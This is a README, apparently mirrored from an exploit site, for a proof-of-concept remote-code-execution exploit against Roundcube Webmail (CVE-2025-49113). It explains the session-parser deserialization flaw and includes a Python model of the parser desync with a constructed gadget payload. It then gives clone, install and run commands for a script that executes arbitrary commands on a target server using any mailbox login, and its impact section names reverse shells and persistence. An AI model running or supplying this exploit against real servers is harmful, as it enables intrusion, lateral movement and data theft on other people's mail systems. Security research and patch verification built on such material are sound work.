## https://sploitus.com/exploit?id=3AFCA595-5CD1-5F55-8948-25280C9FB847
# Roundcube RCE Exploit (CVE-2025-49113)
A fully functional proof-of-concept exploit for **CVE-2025-49113**
---
## Summary
**CVE-2025-49113** is an authenticated remote code execution vulnerability in Roundcube Webmail. It stems from a logic flaw in the application's session parser that allows insecure deserialization of PHP objects: the `_from` parameter handled by `program/actions/settings/upload.php` is not validated, so attacker-controlled data reaches the session store and is later passed through PHP's `unserialize()`. Any authenticated user, including a low-privileged mailbox account, can exploit this to execute arbitrary commands on the server.
---
## Impact
An attacker with **valid credentials** (even low-privileged user accounts) can exploit this flaw to:
- Execute arbitrary system commands.
- Establish reverse shells or deploy persistence.
- Move laterally within the internal network if Roundcube is self-hosted.
---
## Vulnerability Details
- **Type:** Insecure Deserialization → Remote Code Execution
- **Component:** `program/actions/settings/upload.php` (the unvalidated `_from` GET parameter) together with the session parser in `rcube_session`
- **Conditions:** An authenticated session (valid credentials or a captured session cookie) and a crafted serialized payload
- **Exploit Primitive:** PHP `unserialize()` over attacker-influenced session data, with a gadget chain built from classes Roundcube autoloads
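To make the session-parser flaw concrete, here is an added Python model (not the PoC's code and not Roundcube's own) of `rcube_session::unserialize()`, the `session_decode()`-style parser Roundcube uses to turn `name|value` session records back into a PHP array. The session contents, the `!x` key and the `Evil` gadget class are constructed for the example; in the real bug the attacker-chosen name arrives through the unvalidated `_from` parameter, and a working gadget must be a class Roundcube actually autoloads.

```python
import re

# Added example (not the PoC's own code): a Python model of Roundcube's
# rcube_session::unserialize(). It rebuilds 'name|<php-serialized value>'
# records into a PHP array string that Roundcube then hands to unserialize().
# The flaw: a name starting with '!' makes the parser emit N; and skip two
# bytes, so a following string value is re-read as a fresh 'name|value' pair
# and an embedded 'O:...' token becomes a real object at unserialize() time.

def rcube_session_unserialize(data):
    """Return (php_serialized_array, objects_seen), or None where PHP returns false."""
    end, p, items, level, objects, out = len(data), 0, 0, 0, 0, []
    while p < end:
        q = p
        while data[q] != '|':               # scan for the end of the variable name
            q += 1
            if q >= end:
                return 'a:%d:{%s}' % (items, ''.join(out)), objects
        has_value = data[p] != '!'           # '!name' means "no value follows"
        if not has_value:
            p += 1
        name = data[p:q]
        q += 1
        out.append('s:%d:"%s";' % (len(name), name))
        if has_value:
            while True:
                if q >= end:
                    return None
                p, c = q, data[q].lower()
                if c in 'nbid':                  # scalar: copy through ';'
                    while q < end and data[q] != ';':
                        q += 1
                    q += 1
                elif c == 's':                   # string: trust the declared length
                    q += 2
                    m = re.match(r'\d+', data[q:])
                    if not m:
                        return None
                    q += len(m.group()) + 2 + int(m.group()) + 2
                elif c in 'ao':                  # array/object header: descend
                    if c == 'o':
                        objects += 1
                    while q < end and data[q] != '{':
                        q += 1
                    q += 1
                    level += 1
                elif c == '}':
                    q += 1
                    level -= 1
                else:
                    return None
                out.append(data[p:q])
                if level == 0:
                    break
        else:
            out.append('N;')                     # PHP emits N; for the '!' name ...
            q += 2                               # ... and blindly skips two bytes: the desync
        items += 1
        p = q
    return 'a:%d:{%s}' % (items, ''.join(out)), objects


def rcube_session_serialize(vars):
    """Model of rcube_session::serialize(): name|serialize(value), concatenated (ints and strings only)."""
    return ''.join(
        '%s|i:%d;' % (k, v) if isinstance(v, int) else '%s|s:%d:"%s";' % (k, len(v), v)
        for k, v in vars.items())


# Constructed data. 'Evil' stands in for a real gadget class; the key '!x'
# models an attacker-chosen session name (reached via _from in the real bug).
GADGET = 'O:4:"Evil":1:{s:3:"cmd";s:2:"id";}'
BENIGN = rcube_session_serialize({'user_id': 1, 'language': 'en_US'})
SAME_VALUE_SAFE_KEY = rcube_session_serialize({'user_id': 1, 'x': 'ab|' + GADGET})
DESYNC = rcube_session_serialize({'user_id': 1, '!x': 'ab|' + GADGET})

SESSION_NAME_RE = re.compile(r'[A-Za-z0-9_.-]+')

def session_name_is_safe(name):
    """Illustrative allow-list check (not the upstream patch): a name must not
    start with '!' or contain '|', or the parser above can be desynced."""
    return SESSION_NAME_RE.fullmatch(name) is not None


if __name__ == '__main__':
    for label, blob in (('benign', BENIGN), ('safe key', SAME_VALUE_SAFE_KEY), ('! key', DESYNC)):
        php, objects = rcube_session_unserialize(blob)
        print('%-9s objects=%d  %s' % (label, objects, php))
```

Run it and compare the three cases: the same string value is harmless under a normal key, but under a `!`-prefixed key the two-byte skip makes the parser re-read the value as a new record, so the `O:` token reaches `unserialize()` and the gadget's magic methods run. `session_name_is_safe` is the shape of check the upload action lacked; the upstream fix itself is not reproduced here.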
---
## Affected Versions
- **1.5.x:** All versions from `1.5.0` to `1.5.9` (fixed in `1.5.10`)
- **1.6.x:** All versions from `1.6.0` to `1.6.10` (fixed in `1.6.11`)
> Older branches (1.4.x and earlier) have not been tested with this PoC. The flaw lives in core session handling rather than in a plugin, so treat unpatched older installs as vulnerable and upgrade them.
---
## Exploit Requirements
- Python ≥ **3.7**
- PHP ≥ **7.4** (used for local payload crafting)
- Python libraries listed in `requirements.txt`
---
## Setup & Installation
Clone the repository and install the required dependencies:
```bash
git clone https://github.com/BiiTts/Roundcube-CVE-2025-49113.git
cd Roundcube-CVE-2025-49113
pip install -r requirements.txt
```
## Execute
```bash
python3 roundcube_exploit.py http://roundcube.local/ username password "cmd"
```
Pass the target base URL, the credentials of any valid mailbox account, and the command as a single quoted argument. The command runs on the Roundcube host with the privileges of the PHP/web-server process.
## References
https://fearsoff.org/research/roundcube
https://nvd.nist.gov/vuln/detail/CVE-2025-49113
https://hakaisecurity.io/por-tras-da-falha-erro-de-logica-no-parser-de-sessao-do-roundcube-cve-2025-49113/research-blog/